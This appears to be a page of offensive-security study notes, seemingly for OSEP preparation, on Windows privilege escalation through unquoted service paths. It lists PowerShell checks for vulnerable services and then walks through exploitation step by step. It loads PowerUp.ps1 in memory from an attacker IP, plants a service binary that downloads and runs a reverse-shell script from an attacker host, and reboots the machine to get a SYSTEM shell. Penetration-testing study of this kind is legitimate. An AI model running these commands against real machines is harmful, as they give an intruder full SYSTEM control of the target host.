Unquoted Service Path

Unquoted Service Paths – Windows Privilege Escalation

In simple terms, when a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).

Manual Checks

Check service without quotes:

Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
Manual check

Check File or Directory Permissions:

Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
Check directory permissions

Check Service Permissions:

Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
Check service details

Unquoted Service Path with PowerUp

First, import PowerUp.ps1 to memory.

iex ((New-Object Net.WebClient).DownloadString('http://192.168.45.243/OSEP/powershell/PowerUp.ps1'))

Then, check for privilege escalation vectors using this command:

Invoke-AllChecks | fl

Alternatively, for checking unquoted service paths specifically, use this command:

Get-UnquotedService | fl

Example output:

Vulnerable Service

For detail information about the vulnerable service, use this command:

Get-ServiceDetail -Name IObitUnSvr | Select-object *
Service Details

Now, for abusing the service, you can use Write-ServiceBinary command:

Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "powershell iex ((New-Object Net.WebClient).DownloadString('http://kali-machine/revshell.ps1'))" | fl
Write-ServiceBinary

Basically, the above command will replace the original files with a malicious file that contains a reverse shell command.

If you have ability to restart the service, you can run:

Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'

But, since you don't have the privilege to restart the service (CanRestart = False), you can reboot the machine since the service is set to autostart.

shutdown -r -t 0

Now, your netcat listener will have a session with the NT\SYSTEM user.

Shell as Admin
PreviousPrivilege EscalationNextUAC Bypass

Last updated

Was this helpful?